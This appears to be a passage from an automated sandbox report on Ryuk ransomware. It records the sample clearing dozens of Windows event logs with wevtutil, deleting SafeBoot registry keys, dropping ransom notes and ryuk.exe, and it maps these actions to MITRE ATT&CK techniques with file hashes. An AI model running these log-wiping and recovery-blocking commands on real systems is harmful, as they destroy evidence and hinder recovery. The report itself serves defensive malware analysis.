    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:3792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:3348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
    3⤵
    PID:3412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
    3⤵
    - Clears Windows event logs
    PID:2128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
    3⤵
    - Clears Windows event logs
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
    3⤵
    PID:3504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
    3⤵
    PID:4396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
    3⤵
    - Clears Windows event logs
    PID:2704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    - Clears Windows event logs
    PID:3808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
    3⤵
    PID:4832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
    3⤵
    - Clears Windows event logs
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
    3⤵
    - Clears Windows event logs
    PID:784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
    3⤵
    PID:3884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
    3⤵
    PID:3464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
    3⤵
    - Clears Windows event logs
    PID:3416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
    3⤵
    PID:3704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
    3⤵
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
    3⤵
    PID:4972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
    3⤵
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
    3⤵
    PID:2588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppSruProv"
    3⤵
    - Clears Windows event logs
    PID:1300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:2980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
    3⤵
    PID:3212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
    3⤵
    - Clears Windows event logs
    PID:3756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
    3⤵
    PID:4472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
    3⤵
    PID:3712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
    3⤵
    PID:396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
    3⤵
    PID:2284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
    3⤵
    - Clears Windows event logs
    PID:3832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:3860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    - Clears Windows event logs
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:4660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
    3⤵
    PID:3552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:2100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
    3⤵
    PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:1328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    - Clears Windows event logs
    PID:3436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
    3⤵
    PID:3484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
    3⤵
    PID:4312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
    3⤵
    PID:3176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
    3⤵
    PID:724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
    3⤵
    PID:4188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
    3⤵
    PID:4300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
    3⤵
    PID:3816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
    3⤵
    PID:4476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:5008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
    3⤵
    PID:2296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
    3⤵
    PID:4800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    - Clears Windows event logs
    PID:4444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
    3⤵
    PID:3896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:5068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:3576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
    3⤵
    PID:5084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
    3⤵
    - Clears Windows event logs
    PID:4888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
    3⤵
    PID:4708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
    3⤵
    - Clears Windows event logs
    PID:4416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    - Clears Windows event logs
    PID:5104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
    3⤵
    - Clears Windows event logs
    PID:3404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
    3⤵
    PID:2116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
    3⤵
    - Clears Windows event logs
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
    3⤵
    PID:4976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
    3⤵
    - Clears Windows event logs
    PID:2368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
    3⤵
    PID:2176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    - Clears Windows event logs
    PID:1208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
    3⤵
    PID:2860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
    3⤵
    - Clears Windows event logs
    PID:2904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:2416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    - Clears Windows event logs
    PID:4632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
    3⤵
    PID:3900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
    3⤵
    - Clears Windows event logs
    PID:2976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
    3⤵
    PID:2672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
    3⤵
    PID:3332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:2256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:1924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
    3⤵
    - Clears Windows event logs
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
    3⤵
    PID:1012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:2468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:2560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:2276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
    3⤵
    PID:3508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:3992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
    3⤵
    - Clears Windows event logs
    PID:4764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:4920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:2908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:2884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
    3⤵
    PID:3936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
    3⤵
    PID:4584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Call"
    3⤵
    - Clears Windows event logs
    PID:3872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
    3⤵
    PID:2372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
    3⤵
    PID:3116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
    3⤵
    - Clears Windows event logs
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
    3⤵
    PID:1440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
    3⤵
    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
    3⤵
    PID:2588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:1300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:4848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    - Clears Windows event logs
    PID:2752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
    3⤵
    PID:1632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
    3⤵
    PID:296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:4704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
    3⤵
    PID:1900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
    3⤵
    PID:4660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:3476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:4452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:3972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
    3⤵
    - Clears Windows event logs
    PID:3828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
    3⤵
    - Clears Windows event logs
    PID:1392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
    3⤵
    PID:2324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
    3⤵
    - Clears Windows event logs
    PID:2300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
    3⤵
    PID:1304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
    3⤵
    PID:2524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
    3⤵
    PID:2216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
    3⤵
    - Clears Windows event logs
    PID:856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
    3⤵
    PID:3920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
    3⤵
    PID:4076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
    3⤵
    - Clears Windows event logs
    PID:5036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
    3⤵
    PID:4784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
    3⤵
    PID:716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    - Clears Windows event logs
    PID:4468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    - Clears Windows event logs
    PID:4856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
    3⤵
    - Clears Windows event logs
    PID:4132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:2144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
    3⤵
    PID:3048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
    3⤵
    PID:4228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
    3⤵
    PID:2840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
    3⤵
    - Clears Windows event logs
    PID:2084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:3164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
    3⤵
    PID:3540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
    3⤵
    PID:2332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:1436

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:432

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt

Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe

Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\ProgramData\RYUKID

Filesize
8B

MD5
96646b6ffcf3af7eb064254bce631a92

SHA1
39b6ce490f09e18700c2dfd7e9c5d0f838c18015

SHA256
083c5e0e62549bba38194e0255cab45e22fcbbc616eccf2cac65b5d06448325e

SHA512
62549bd813666a1ca1e6b0b134e23b5b7b2f97b41bf714cdbe255d43e3a29f49c77dae6067654c7ddfb6795d2cb21faffb61f90e9dae2d02a24ac8a0b7217f1f

Download Submit
C:\ProgramData\RyukReadMe.html

Filesize
152B

MD5
a641bf8ac8307aad57ecab53872e67db

SHA1
6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

SHA256
9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

SHA512
7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

Download Submit
C:\ProgramData\RyukReadMe.html.[[email protected]].RYK

Filesize
858B

MD5
563eebf53b99fa7232c70d3c0f62ef70

SHA1
2c96a4601310932c56aff155b4c349d967fef7b3

SHA256
c9b4f3cc18eda52e4d44dc28f88fb08de2d0c795300b3cfa76bb74628da2cbf9

SHA512
27ac815dd47873dbc77854c0f23e5b3fe5109d214f57bf109c1fa3197614b669826fbe5474550bfb6717a9a6ade1076723ef799ea217de98a82879fb8b5892c9

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
